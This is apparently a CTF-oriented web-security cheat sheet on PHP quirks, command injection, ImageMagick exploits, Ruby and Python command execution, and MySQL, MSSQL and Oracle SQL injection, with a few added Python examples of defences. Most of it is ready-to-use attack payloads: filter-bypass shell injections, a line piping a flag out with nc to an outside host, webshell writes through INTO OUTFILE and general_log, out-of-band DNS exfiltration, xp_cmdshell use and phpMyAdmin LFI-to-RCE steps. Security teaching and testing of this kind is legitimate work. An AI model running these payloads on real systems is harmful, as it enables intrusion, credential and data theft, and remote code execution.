  - https://ssd-disclosure.com/ssd-advisory-php-spldoublylinkedlist-uaf-sandbox-escape/
  - Affected
    - PHP version 8.0 (alpha)
    - PHP version 7.4.10 and prior (probably also future versions will be affected)
  - Example
- more to be added later......
Others
- case-insensitive
<?PhP sYstEm(ls);
- echo (true ? 'a' : false ? 'b' : 'c');
b
- echo `whoami`;
kaibro
- regular expressions: . does not match the newline character %0a
- common regex mistake:
preg_match("/\\/", $str)
  - to match a backslash you must use \\\\ rather than \\
- operator precedence
$a = true && false;
$a => false
$a = true and false;
$a => true
- chr()
  - values above 256 are taken mod 256
  - negative values have 256 added repeatedly until the result is > 0
  - Example:
chr(259) === chr(3)
chr(-87) === chr(169)
- increment
$a="9D9"; var_dump(++$a);
string(3) "9E0"
$a="9E0"; var_dump(++$a);
float(10)
- arithmetic operators to bypass filters
%f3%f9%f3%f4%e5%ed & %7f%7f%7f%7f%7f%7f
system
  - usable where alphanumerics are forbidden or certain special characters are filtered
$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');
assert
  - other operators such as ~ and ++ can build strings with the same idea
- curly braces
  - array and string elements can be accessed with curly braces: $array{index} as well as $array[index]
- filter_var
filter_var('http://evil.com;google.com', FILTER_VALIDATE_URL)
  - False
filter_var('0://evil.com;google.com', FILTER_VALIDATE_URL)
  - True
filter_var('"aaaaa{}[]()\'|!#$%*&^-_=+`,."@b.c',FILTER_VALIDATE_EMAIL)
"aaaaa{}[]()'|!#$%*&^-_=+`,."@b.c (OK)
filter_var('aaa."bbb"@b.c',FILTER_VALIDATE_EMAIL)
aaa."bbb"@b.c (OK)
filter_var('aaa"bbb"@b.c',FILTER_VALIDATE_EMAIL)
  - False
- json_decode
  - does not accept a raw newline or \t character directly
  - but accepts the escape sequences '\n' and '\t'
  - which are converted to a newline and a Tab
  - also accepts the \uxxxx form: json_decode('{"a":"\u0041"}')
- === bug
var_dump([0 => 0] === [0x100000000 => 0])
  - True on some versions
  - ASIS 2018 Qual Nice Code
  - https://3v4l.org/sUEMG
- openssl_verify
  - signs with SHA1 by default, so SHA1 collisions may be a problem
  - e.g. DEFCON CTF 2018 Qual - EasyPisy
- Namespace
  - PHP's default global space is \
  - e.g. \system('ls');
- basename (php bug 62119)
basename("index.php/config.php/喵")
config.php
  - Example: zer0pts CTF 2020 - Can you guess it?
- strip_tags (php bug 78814)
  - php version <= 7.4.0
strip_tags("<s/trong>b</strong>", "<strong>")
<s/trong>b</strong>
  - Example: zer0pts CTF 2020 - MusicBlog
- mb_strpos / mb_substr
  - when mb_strpos reads a utf-8 leading byte it keeps reading forward; when it hits an invalid byte, everything before it is treated as one character
  - Example:
mb_strpos("\xf0\x9fAAA<BB", '<')
->4
  - mb_substr behaves differently: on a leading byte it skips the continuation bytes
  - Example:
mb_substr("\xf0\x9fAAA<BB", 0, 4)
->"\xf0\x9fAAA<B"
  - ref: Joomla XSS
Command Injection
| cat flag
&& cat flag
; cat flag
%0a cat flag
"; cat flag
`cat flag`
cat $(ls)
"; cat $(ls)
`cat flag | nc kaibro.tw 5278`
. flag
PS1=$(cat flag)
`echo${IFS}${PATH}|cut${IFS}-c1-1`
=> /
? and *
- ? matches one character
cat fl?g
/???/??t /???/p??s??
- * matches any number of characters
cat f*
cat f?a*
Whitespace bypass
${IFS}
cat${IFS}flag
ls$IFS-alh
cat$IFS$2flag
cat</etc/passwd
{cat,/etc/passwd}
X=$'cat\x20/etc/passwd'&&$X
IFS=,;`cat<<<uname,-a`
- bash only
Keyword bypass
- String Concat
A=fl;B=ag;cat $A$B
- Empty Variable
cat fl${x}ag
cat tes$(z)t/flag
- Environment Variable
$PATH => "/usr/local/….blablabla"
${PATH:0:1} => '/'
${PATH:1:1} => 'u'
${PATH:0:4} => '/usr'
${PS2} => >
${PS4} => +
- Empty String
cat fl""ag
cat fl''ag
cat "fl""ag"
- Backslash
c\at fl\ag
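Why the whitespace and keyword tricks above get past a blocklist, and what actually stops them, as an added Python example that is not from the README. naive_filter() is a hypothetical blocklist of the kind these tricks are aimed at; run_as_argv() is the mitigation: the user-supplied value travels as one argv element with no shell in between, so ${IFS}, $(...), quotes and backslashes are never interpreted. The child process is a python one-liner that prints its argv[1] back, standing in for whatever helper program a real application would call.

```python
import shlex
import subprocess
import sys

# Constructed blocklist: the kind of filter the tricks above are built to slip past.
BLOCKED_TOKENS = (" ", "flag", ";", "|", "&&")


def naive_filter(value: str) -> bool:
    """Return True if the value contains none of the blocked tokens.
    "cat${IFS}fl''ag" passes even though a shell turns it into `cat flag`."""
    return not any(token in value for token in BLOCKED_TOKENS)


def run_as_argv(value: str) -> str:
    """Mitigation: pass the value as a single argv element, shell=False.
    The child (a python one-liner standing in for a real helper) prints
    argv[1] back, so the return value is exactly what the child received."""
    completed = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1], end='')", value],
        capture_output=True,
        text=True,
        check=True,
    )
    return completed.stdout


def quote_for_shell(value: str) -> str:
    """If a shell command line is unavoidable, quote the value so the shell
    treats it as one literal word; ${IFS} and $(...) stay uninterpreted."""
    return shlex.quote(value)


if __name__ == "__main__":
    for sample in ("cat${IFS}fl''ag", "cat fl${x}ag; id", "c\\at fl\\ag"):
        verdict = "pass" if naive_filter(sample) else "block"
        print(f"{sample!r}: filter={verdict}, child saw {run_as_argv(sample)!r}, "
              f"quoted={quote_for_shell(sample)}")
```

The point of run_as_argv() is that nothing in the argv path performs word splitting or expansion: the bytes that reach the child are the bytes the user sent, so there is no filter to get around. shlex.quote() is the fallback for code that must build a command string, and it is only safe when the quoted value is the whole argument, never when it is spliced inside an existing quoted region.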
ImageMagick
- CVE-2016-3714 (ImageTragick)
  - the mvg format includes https handling (fetched with curl), which allows closing the double quote
  - payload:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://kaibro.tw";ls "-la)'
pop graphic-context
  - Example
    - Google CTF 2019 - GPhotos
- Some Debians appear to have insecure ImageMagick configuration by default
  - read file:
<?xml version="1.0" encoding="UTF-8"?>
<svg width="120px" height="120px">
<image width="120" height="120" href="text:/etc/passwd" />
</svg>
  - copy file (MSL):
<image>
<!-- ImageMagick's legend is "image processing" so the tag is named "image". -->
<read filename="image.png" />
<!-- To make the legend more compelling "image.png" is checked to be a valid image file. -->
<write filename="/var/www/html/shell.php" />
<!-- This line gives access to a hacker accomplishing the mission of the MSL format and ImageMagick in general -->
</image>
  - TokyoWesterns CTF 2018 - Slack emoji converter
    - ghostscript RCE
  - TokyoWesterns CTF 2019 - Slack emoji converter Kai
    - ghostscript RCE
  - Google CTF 2019 - GPhotos
Ruby Command Executing
open("| ls")
IO.popen("ls").read
Kernel.exec("ls")
Kernel.method("open").call("|ls").read()
`ls`
system("ls")
eval("ruby code")
- Non-Alphanumeric example: HITCON CTF 2015 - Hard to say
$$/$$ => 1
'' << 97 << 98 << 99 => "abc"
$: is $LOAD_PATH
exec("ls")
%x{ls}
/%x'ls'
/%x[ls]
/%x(ls)
/%x;ls;
"Process".constantize.spawn("id")
Process.spawn("id")
PTY.spawn("id")
- Net::FTP
  - CVE-2017-17405
  - uses Kernel#open
Python Command Executing
os.system("ls")
os.popen("ls").read()
os.execl("/bin/ls","")
os.execlp("ls","")
os.execv("/bin/ls",[''])
os.execvp("/bin/ls",[""])
subprocess.call("ls")
subprocess.call("ls|cat",shell=False) => Fail
subprocess.call("ls|cat",shell=True) => Correct
eval("__import__('os').system('ls')")
exec("__import__('os').system('ls')")
commands.getoutput('ls') (Python 2 only)
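The `shell=False` => Fail / `shell=True` => Correct pair above is the whole command-injection story for `subprocess` in one line: without a shell the string is looked up as a program name and pipes never run, with a shell every metacharacter in the string is live. The following is an added example, not code from the cheatsheet, showing the same value handled three ways; `echo` stands in for whatever program the application actually calls.

```python
import shlex
import subprocess

# A value as it might arrive from a request parameter (constructed for the example).
INJECTED = "hello; echo INJECTED"


def run_with_shell(value):
    """shell=True: the whole string is parsed by /bin/sh, so the ';' in value
    ends the echo and starts a second command."""
    return subprocess.run(f"echo {value}", shell=True,
                          capture_output=True, text=True).stdout


def run_with_argv(value):
    """No shell: value is one argv element of echo, metacharacters are inert."""
    return subprocess.run(["echo", value], capture_output=True, text=True).stdout


def run_quoted(value):
    """If a shell is unavoidable, shlex.quote() turns value into one literal word."""
    return subprocess.run("echo " + shlex.quote(value), shell=True,
                          capture_output=True, text=True).stdout


def pipe_without_shell():
    """Mirrors the page's subprocess.call("ls|cat", shell=False) => Fail: the whole
    string is looked up as a program named 'echo hi|cat', so nothing runs."""
    try:
        subprocess.run("echo hi|cat")
        return "ran"
    except FileNotFoundError:
        return "FileNotFoundError"


if __name__ == "__main__":
    print(repr(run_with_shell(INJECTED)))   # two lines: the second command ran
    print(repr(run_with_argv(INJECTED)))    # one line, the ';' is just text
    print(repr(run_quoted(INJECTED)))       # one line
    print(pipe_without_shell())
```

The argv form is the fix to prefer; `shlex.quote()` is the fallback when an existing code path insists on a shell string, and it only protects the one argument it wraps.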
Read File
- diff /etc/passwd /flag
- paste /flag
- bzmore /flag
- bzless /flag
- static-sh /flag
- ...
SQL Injection
MySQL
- Substring:
substr("abc",1,1) => 'a'
mid("abc", 1, 1) => 'a'
- Ascii function
ascii('A') => 65
- Char function
char(65) => 'A'
- Concatenation
CONCAT('a', 'b') => 'ab'
- returns NULL if any argument is NULL
CONCAT_WS(separator, str1, str2, ...)
CONCAT_WS('@', 'gg', 'inin') => gg@inin
- Cast function
CAST('125e342.83' AS signed) => 125
CONVERT('23',SIGNED) => 23
- Delay function
sleep(5)
BENCHMARK(count, expr)
- Whitespace characters
09 0A 0B 0C 0D A0 20
- File-read function
LOAD_FILE('/etc/passwd')
LOAD DATA INFILE
- the client reads a file on the server
- subject to the same secure_file_priv and FILE privilege restrictions (ref: link)
LOAD DATA LOCAL INFILE
- the server reads a file on the client
LOAD DATA LOCAL INFILE '/etc/hosts' INTO TABLE test FIELDS TERMINATED BY "\n";
- no FILE privilege needed, and a file in any directory can be read (as long as the client can read it)
- supports UNC paths
LOAD DATA LOCAL INFILE '\\\\172.16.136.153\\test' into table mysql.test FIELDS TERMINATED BY "\n";
- stealing net-NTLM hash
- Trigger phar deserialization
LOAD DATA LOCAL INFILE 'phar://test.phar/test' INTO TABLE a LINES TERMINATED BY '\n'
- non-default configuration
[mysqld] local-infile=1 secure_file_priv=""
- Tool
- Example
- load_file with WebDAV
load_file('//kaibro.tw@9478/meow.php')
load_file('\\\\kaibro.tw@9478/meow.php')
- when the WebClient service is running on a Windows host, MySQL load_file + UNC path sends an HTTP request to the given URL (the port is given after @)
- in practice, with web and DB on separate hosts, if the backend MySQL host also runs a web server this can be used to first write a webshell and then send an HTTP request to trigger it
- Example
- File-write
INTO DUMPFILE
- for binary data (writes a single line)
INTO OUTFILE
- for plain text (all lines)
- write a webshell
- a writable path must be known
UNION SELECT "<? system($_GET[1]);?>",2,3 INTO OUTFILE "/var/www/html/temp/shell.php"
- Privilege
SELECT file_priv FROM mysql.user
- secure-file-priv
- restricts MySQL import/export
- load_file, into outfile, load data, etc.
- cannot be changed at runtime
- before MySQL 5.5.53 this variable defaulted to empty (import/export allowed)
- e.g. secure_file_priv=E:\
- import/export restricted to E:\
- e.g. secure_file_priv=null
- import/export not allowed at all
- getting a shell through general_log under the secure-file-priv restriction
SET global general_log='on'; SET global general_log_file='C:/phpStudy/WWW/cmd.php'; SELECT '<?php assert($_POST["cmd"]);?>';
- IF statement
- IF(condition,true-part,false-part)
SELECT IF (1=1,'true','false')
- Hex
SELECT X'5061756c'; => paul
SELECT 0x5061756c; => paul
SELECT 0x5061756c+0 => 1348564332
SELECT load_file(0x2F6574632F706173737764);
- /etc/passwd
- can bypass some WAFs
- e.g. when single quotes cannot be used (' => \'); CHAR() achieves a similar effect
'admin' => CHAR(97, 100, 109, 105, 110)
- Comments:
#
--
/**/
- a single */ closes several preceding /*
/*! 50001 select * from test */
- can probe the version
- e.g. SELECT /*!32302 1/0, */ 1 FROM tablename
`
- MySQL <= 5.5
;
- PDO supports multiple statements
- information_schema
- mysql >= 5.0
- Stacking Query
- by default PHP+MySQL does not support stacked queries
- but PDO does
- Others:
- @@version
- same as version()
- user()
- current_user
- current_user()
- SESSION_USER()
- SYSTEM_USER()
- current user
- system_user()
- database system user
- database()
- schema()
- current database
- @@basedir
- MySQL installation path
- @@datadir
- Location of db file
- @@plugin_dir
- @@hostname
- @@version_compile_os
- Operating System
- @@version_compile_machine
- @@innodb_version
- @@global.secure_file_priv
- MD5()
- SHA1()
- COMPRESS() / UNCOMPRESS()
- group_concat()
- merges multiple rows into one result
- e.g. select group_concat(username) from users;
returns all usernames at once
- group_concat_max_len = 1024 (default)
- json_arrayagg()
- MySQL >= 5.7.22
- same idea as above
- e.g. SELECT json_arrayagg(concat_ws(0x3a,table_schema,table_name)) from INFORMATION_SCHEMA.TABLES
- greatest()
greatest(a, b) returns the larger of a and b
greatest(1, 2)=2 => 1
greatest(1, 2)=1 => 0
- between a and b
- true when the value lies between a and b
greatest(1, 2) between 1 and 3 => 1
- regexp
SELECT 'abc' regexp '.*' => 1
- Collation
*_ci: case insensitive collation (ignores case)
*_cs: case sensitive collation (respects case)
*_bin: binary, case sensitive collation (respects case)
- Union Based
- determine the number of columns
union select 1,2,3...N
order by N
find the last N that still succeeds
AND 1=2 UNION SELECT 1, 2, password FROM admin--+
LIMIT N, M
skip the first N rows, take M rows
- list database names
union select 1,2,schema_name from information_schema.schemata limit 1,1
- list table names
union select 1,2,table_name from information_schema.tables where table_schema='mydb' limit 0,1
union select 1,2,table_name from information_schema.columns where table_schema='mydb' limit 0,1
- list column names
union select 1,2,column_name from information_schema.columns where table_schema='mydb' limit 0,1
- MySQL User
SELECT CONCAT(user, ":" ,password) FROM mysql.user;
- Error Based
- Length limit
- error messages have a length limit
#define ERRMSGSIZE (512)
- Overflow
- only MySQL > 5.5.5 reports an error on overflow
SELECT ~0 => 18446744073709551615
SELECT ~0 + 1 => ERROR
SELECT exp(709) => 8.218407461554972e307
SELECT exp(710) => ERROR
- if the query succeeds, 0 is returned
SELECT exp(~(SELECT * FROM (SELECT user())x));
ERROR 1690(22003):DOUBLE value is out of range in 'exp(~((SELECT 'root@localhost' FROM dual)))'
select (select(!x-~0)from(select(select user())x)a);
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '((not('root@localhost')) - ~(0))'
- MySQL > 5.5.53 no longer shows the query result in the error message
- xpath
- extractvalue (length limit: 32 characters)
select extractvalue(1,concat(0x7e,(select @@version),0x7e));
ERROR 1105 (HY000): XPATH syntax error: '~5.7.17~'
- updatexml (length limit: 32 characters)
select updatexml(1,concat(0x7e,(select @@version),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~5.7.17~'
- Duplicate primary key
select count(*) from test group by concat(version(),floor(rand(0)*2));
ERROR 1062 (23000): Duplicate entry '5.7.171' for key '<group_key>'
- Other functions (5.7)
select ST_LatFromGeoHash(version());
select ST_LongFromGeoHash(version());
select GTID_SUBSET(version(),1);
select GTID_SUBTRACT(version(),1);
select ST_PointFromGeoHash(version(),1);
- Get database, table and column names
- when keywords such as information_schema are filtered, the following methods work
- database name
select 1,2,3 from users where 1=abc();
ERROR 1305 (42000): FUNCTION fl4g.abc does not exist
- table name
select 1,2,3 from users where Polygon(id);
select 1,2,3 from users where linestring(id);
ERROR 1367 (22007): Illegal non geometric '`fl4g`.`users`.`id`' value found during parsing
- column names
select 1,2,3 from users where (select * from (select * from users as a join users as b)as c);
ERROR 1060 (42S21): Duplicate column name 'id'
select 1,2,3 from users where (select * from (select * from users as a join users as b using(id))as c);
ERROR 1060 (42S21): Duplicate column name 'username'
- Blind Based (Time/Boolean)
- Boolean
- distinguishes "has a result" from "no result"
id=87 and length(user())>0
id=87 and length(user())>100
id=87 and ascii(mid(user(),1,1))>100
id=87 or ((select user()) regexp binary '^[a-z]')
- Time
- used when no result at all is visible
id=87 and if(length(user())>0, sleep(10), 1)=1
id=87 and if(length(user())>100, sleep(10), 1)=1
id=87 and if(ascii(mid(user(),1,1))>100, sleep(10), 1)=1
- Out of Band
- Windows only
select load_file(concat("\\\\",schema_name,".dns.kaibro.tw/a")) from information_schema.schemata
- Bypass whitespace checks
id=-1/**/UNION/**/SELECT/**/1,2,3
id=-1%09UNION%0DSELECT%0A1,2,3
id=(-1)UNION(SELECT(1),2,3)
- Wide-byte injection
addslashes() turns ' into \'
- under GBK encoding a Chinese character is represented by two bytes
- other multi-byte encodings work too
- but the range of the low byte must include 0x5c (\)
- the first byte must be >128 to form a Chinese character
%df' => %df\' => 運' (successfully escaped)
- Order by injection
- can be checked simply with asc / desc
?sort=1 asc
?sort=1 desc
- cannot be followed by UNION
- with known column names (blind injection is possible)
?order=IF(1=1, username, password)
- using errors
?order=IF(1=1,1,(select 1 union select 2)) => correct
?order=IF(1=2,1,(select 1 union select 2)) => error
?order=IF(1=1,1,(select 1 from information_schema.tables)) => normal
?order=IF(1=2,1,(select 1 from information_schema.tables)) => error
- Time Based
?order=if(1=1,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test)) => normal
?order=if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test)) => sleeps 2 seconds
- group by with rollup
' or 1=1 group by pwd with rollup limit 1 offset 2#
- Convert a string to a pure number
- string -> hex -> decimal
conv(hex(YOUR_DATA), 16, 10)
- reverse:
unhex(conv(DEC_DATA,10,16))
- take care not to overflow
- Without commas
LIMIT N, M => LIMIT M OFFSET N
mid(user(), 1, 1) => mid(user() from 1 for 1)
UNION SELECT 1,2,3 => UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c)
- Quickly find tables with keyword column names
select table_schema,table_name,column_name from information_schema.columns where table_schema !=0x696E666F726D6174696F6E5F736368656D61 and table_schema !=0x6D7973716C and table_schema !=0x706572666F726D616E63655F736368656D61 and (column_name like '%pass%' or column_name like '%pwd%');
- Unknown column names and no access to information_schema
- the table name must be known
- e.g.: article, admin
select title from article where id = 4 and 0 union SELECT group_concat(a, 0x3a, b) FROM (SELECT 1 a,2 b,3 c UNION SELECT * FROM admin)x
- if the column count is too small, keep adding 4,5,6,7,... until it matches
- innodb
- the table engine is innodb
- MySQL > 5.5
- innodb_table_stats and innodb_table_index store all database and table names
select table_name from mysql.innodb_table_stats where database_name=<db_name>;
- Example: Codegate2018 prequal - simpleCMS
- sys
sys.statements_with_full_table_scans
- can be used to find table names
- see the PPP simpleCMS writeup for details
select query from sys.statements_with_full_table_scans
- MySQL 5.7
- Bypass WAF
select password => SelEcT password (case)
select password => select/**/password (whitespace bypass)
select password => s%65lect%20password (URL encode)
select password => select(password) (whitespace bypass)
select password => select%0apassword (whitespace bypass)
- %09, %0a, %0b, %0c, %0d, %a0
select password from admin => select password /*!from*/ admin (MySQL comment)
information_schema.schemata => `information_schema`.schemata (keyword/whitespace bypass)
select xxx from`information_schema`.schemata
select pass from user where id='admin' => select pass from user where id=0x61646d696e (quote bypass)
id=concat(char(0x61),char(0x64),char(0x6d),char(0x69),char(0x6e))
?id=0e2union select 1,2,3 (scientific notation)
?id=1union select 1,2,3
or ?id=0e1union(select~1,2,3) (~)
?id=.1union select 1,2,3 (dot)
WHERE => HAVING (keyword bypass)
AND => && (keyword bypass)
OR => ||
= => LIKE
a = 'b' => not a > 'b' and not a < 'b'
> 10 => not between 0 and 10
LIMIT 0,1 => LIMIT 1 OFFSET 0 (comma bypass)
substr('kaibro',1,1) => substr('kaibro' from 1 for 1)
- Multipart/form-data bypass
- spoofed User-Agent
- e.g. some WAFs do not block google bot
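Every trick in the list above survives only as long as the inspecting component matches the raw bytes. The defensive counterpart is to canonicalize first (URL-decode twice, strip `/**/` and `/*!nnnnn` comments, treat the six alternative whitespace bytes and backticks as separators, split glued tokens such as `0e1union`) and only then look for keywords. The following normalizer is an added example, not code from the cheatsheet; the keyword list is a constructed, deliberately short one.

```python
import re
from urllib.parse import unquote_plus

# Keywords worth alerting on in a user-supplied parameter (constructed list;
# a real deployment would carry a longer one).
KEYWORDS = ("union", "select", "information_schema", "load_file",
            "into outfile", "sleep", "benchmark", "extractvalue", "updatexml")


def normalize(fragment):
    """Undo the obfuscations listed in the Bypass WAF section before matching."""
    s = fragment
    for _ in range(2):                              # s%2565lect -> s%65lect -> select
        s = unquote_plus(s)
    s = re.sub(r"/\*!\d*", " ", s)                  # /*!50001 from*/ : keep the body
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)    # /**/ used as whitespace
    s = s.replace("*/", " ").replace("`", " ")      # stray closers, `keyword` quoting
    s = re.sub(r"([()~,=])", r" \1 ", s)            # select(password), union(select~1,2,3)
    s = re.sub(r"(\d)([A-Za-z])", r"\1 \2", s)      # 0e1union, .1union, 1union
    s = re.sub(r"[\s\x0b\x0c\xa0]+", " ", s)        # %09 %0a %0b %0c %0d %a0 %20
    return s.strip().lower()


def suspicious_keywords(fragment):
    """Keywords present in the normalized form of a parameter value."""
    s = normalize(fragment)
    return [k for k in KEYWORDS if re.search(r"\b%s\b" % re.escape(k), s)]


if __name__ == "__main__":
    for sample in ("s%65lect%0apassword", "?id=0e1union(select~1,2,3)",
                   "select xxx from`information_schema`.schemata", "kaibro"):
        print(repr(sample), "->", repr(normalize(sample)), suspicious_keywords(sample))
```

Normalization is the part that is hard to get right, so it belongs in one shared function that both the detection rule and the audit log use; matching on the raw request and on the normalized one, and alerting when they disagree, is a cheap way to surface obfuscation attempts themselves.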
- phpMyAdmin
- write a file to get a shell
- conditions
- root privilege
- known web path
- file write permission
select "<?php phpinfo();?>" INTO OUTFILE "c:\\phpstudy\\www\\shell.php"
- general_log getshell
- conditions
- read/write privilege
- known web path
- step1. enable the log:
set global general_log = "ON";
- step2. set the log file:
set global general_log_file = "/var/www/html/shell.php";
- step3. write php:
select "<?php phpinfo();?>";
- slow_query getshell
- step1. set the log path:
set GLOBAL slow_query_log_file='/var/www/html/shell.php';
- step2. enable slow_query_log:
set GLOBAL slow_query_log=on;
- step3. write php:
select '<?php phpinfo();?>' from mysql.db where sleep(10);
- CVE-2018-19968
- phpMyAdmin versions: 4.8.0 ~ 4.8.3
- LFI to RCE
- conditions
- able to log in to the admin panel
- step1.
CREATE DATABASE foo;CREATE TABLE foo.bar (baz VARCHAR(100) PRIMARY KEY );INSERT INTO foo.bar SELECT '<?php phpinfo(); ?>';
- step2.
/chk_rel.php?fixall_pmadb=1&db=foo
- step3.
INSERT INTO `pma__column_info` SELECT '1', 'foo', 'bar', 'baz', 'plop','plop', ' plop', 'plop','../../../../../../../../tmp/sess_{SESSIONID}','plop';
- step4.
/tbl_replace.php?db=foo&table=bar&where_clause=1=1&fields_name[multi_edit][][]=baz&clause_is_unique=1
- CVE-2018-12613
- phpMyAdmin versions: 4.8.x
- LFI to RCE
- conditions
- able to log in to the admin panel
- Payload
index.php?target=db_sql.php%253f/../../../../../../windows/system.ini
index.php?target=sql.php%253f/../../../tmp/tmp/sess_16rme70p2qqnqjnhdiq3i6unu
- SQL statements run in the console are written into the session file
- the session id can be taken from the phpMyAdmin cookie
- CVE-2016-5734
- phpmyadmin versions:
- 4.0.x before 4.0.10.16
- 4.4.x before 4.4.15.7
- 4.6.x before 4.6.3
- php version:
- 4.3.0 ~ 5.4.6
- preg_replace RCE
- conditions
- able to log in to the admin panel
- CVE-2014-8959
- phpMyAdmin version:
- 4.0.1 ~ 4.2.12
- php version:
- < 5.3.4
- conditions
- able to log in to the admin panel
- null-byte truncation possible
- Payload:
gis_data_editor.php?token=2941949d3768c57b4342d94ace606e91&gis_data[gis_type]=/../../../../phpinfo.txt%00
(the token must be changed)
- CVE-2013-3238
- versions: 3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3
- https://www.exploit-db.com/exploits/25136
- CVE-2012-5159
- versions: v3.5.2.2
- server_sync.php Backdoor
- https://www.exploit-db.com/exploits/21834
- CVE-2009-1151
- versions: 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1
- config/config.inc.php command execution
- https://www.exploit-db.com/exploits/8921
- Weak / universal passwords
- phpmyadmin 2.11.9.2: root / empty password
- phpmyadmin 2.11.3 / 2.11.4: username:
'localhost'@'@"
MSSQL
- Substring:
SUBSTRING("abc", 1, 1) => 'a'
- Ascii function
ascii('A') => 65
- Char function
char(65) => 'A'
- Concatenation
+
'a'+'b' => 'ab'
- Delay function
WAITFOR DELAY '0:0:10'
- Whitespace characters
01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20
- IF statement
- IF condition true-part ELSE false-part
IF (1=1) SELECT 'true' ELSE SELECT 'false'
- Comments:
--
/**/
- TOP
- MSSQL has no LIMIT N, M
SELECT TOP 87 * FROM xxx
takes the first 87 rows
- take rows 78~87
SELECT pass FROM (SELECT pass, ROW_NUMBER() OVER (ORDER BY (SELECT 1)) AS LIMIT FROM mydb.dbo.mytable)x WHERE LIMIT between 78 and 87
- Others:
- user
- db_name()
- user_name()
- @@version
- @@language
- @@servername
- host_name()
- has_dbaccess('master')
- Query users
select name, loginame from master..syslogins, master..sysprocesses
- Query user passwords
select user,password from master.dbo.syslogins
- Is the current role sysadmin
SELECT is_srvrolemember('sysadmin')
- Is the current role db_owner
SELECT IS_MEMBER('db_owner')
- List DB names
DB_NAME(N)
UNION SELECT NULL,DB_NAME(N),NULL--
UNION SELECT NULL,name,NULL FROM master ..sysdatabases--
SELECT catalog_name FROM information_schema.schemata
1=(select name from master.dbo.sysdatabases where dbid=5)
- List table names
SELECT table_catalog, table_name FROM information_schema.tables
SELECT name FROM sysobjects WHERE xtype='U'
ID=02';if (select top 1 name from DBname..sysobjects where xtype='U' and name not in ('table1', 'table2'))>0 select 1--
- List columns
SELECT table_catalog, table_name, column_name FROM information_schema.columns
SELECT name FROM syscolumns WHERE id=object_id('news')
ID=1337';if (select top 1 col_name(object_id('table_name'), i) from sysobjects)>0 select 1--
SELECT name FROM DBNAME..syscolumns WHERE id=(SELECT id FROM DBNAME..sysobjects WHERE name='TABLENAME')
- Get all data at once
select quotename(name) from master..sysdatabases FOR XML PATH('')
select concat_ws(0x3a,table_schema,table_name,column_name) from information_schema.columns for json auto
- Union Based
- column types must match
- NULL can be used to avoid the problem
- Error Based
- use type conversion errors
id=1 and user=0
- Out of Band
declare @p varchar(1024);set @p=(SELECT xxxx);exec('master..xp_dirtree "//'+@p+'.oob.kaibro.tw/a"')
fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select+pass+from+users+where+id=1)%2b'.064edw6l0h153w39ricodvyzuq0ood.burpcollaborator.net\1.xem',null,null)
- Requires VIEW SERVER STATE permission on the server
fn_get_audit_file('\\'%2b(select+pass+from+users+where+id=1)%2b'.x53bct5ize022t26qfblcsxwtnzhn6.burpcollaborator.net\',default,default)
- Requires the CONTROL SERVER permission.
fn_trace_gettable('\\'%2b(select pass from users where id=1)%2b'.oob.kaibro.tw',default)
- Requires the CONTROL SERVER permission.
- Check whether web and DB are on separate hosts
- client hostname:
select host_name();
- server hostname:
select @@servername;
- if the two differ, the web and DB hosts are separate
- Read file
select x from OpenRowset(BULK 'C:\Windows\win.ini',SINGLE_CLOB) R(x)
- xp_cmdshell
- enabled by default in MSSQL 2000
- disabled by default since MSSQL 2005
- with sa privilege it can be enabled through sp_configure
EXEC sp_configure 'show advanced options',1 RECONFIGURE EXEC sp_configure 'xp_cmdshell',1 RECONFIGURE
- execute a command
exec xp_cmdshell 'whoami'
- disable xp_cmdshell
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure'xp_cmdshell', 0; RECONFIGURE;
- Quickly find tables with keyword column names
SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND (syscolumns.name LIKE '%pass%' or syscolumns.name LIKE '%pwd%' or syscolumns.name LIKE '%first%');
- Bypass WAF
- Non-standard whitespace character:
1%C2%85union%C2%85select%C2%A0null,@@version,null--
- obfuscated UNION
0eunion+select+null,@@version,null--
- Unicode bypass
- IIS decodes Unicode encoding, so s%u0065lect is parsed as select
Oracle
- a SELECT statement must include FROM
- when there is no source table, use the dual table
- Substring:
SUBSTR('abc', 1, 1) => 'a'
- Whitespace characters
00 0A 0D 0C 09 20
- IF statement
IF condition THEN true-part [ELSE false-part] END IF
- Comments:
--
/**/
- LIMIT is not supported
- use rownum instead
select table_name from (select rownum no, table_name from all_tables) where no=1
- Single vs double quotes
- single quotes: string, date
- double quotes: identifier (table name, column name, ...)
- Others
SYS.DATABASE_NAME
- current database
USER
- current user
- or sys.login_user
SELECT role FROM session_roles
- current role
SELECT privilege FROM user_sys_privs
- system privileges granted to the current user
SELECT privilege FROM role_sys_privs
- privileges the current role has
SELECT privilege FROM session_privs
- all privileges the current user has = user_sys_privs + role_sys_privs
SELECT banner FROM v$version where rownum=1
- database version
SELECT host_name FROM v$instance;
- Name of the host machine
SELECT banner FROM v$version WHERE banner LIKE 'TNS%'
- operating system version
utl_inaddr.get_host_address
- local IP
select utl_inaddr.get_host_name('87.87.87.87') from dual
- reverse DNS lookup
dba_tables
- information on all tables in the system; needs dba privilege
user_tables
- information on the tables owned by the current user
- schema names
SELECT DISTINCT OWNER FROM ALL_TABLES
- table names
SELECT OWNER, TABLE_NAME FROM ALL_TABLES
- Column
SELECT OWNER, TABLE_NAME, COLUMN_NAME FROM ALL_TAB_COLUMNS
- Union Based
- column types must match
- NULL can be used to avoid errors
UNION SELECT 1, 'aa', null FROM dual
- Time Based
dbms_pipe.receive_message(('a'),10)
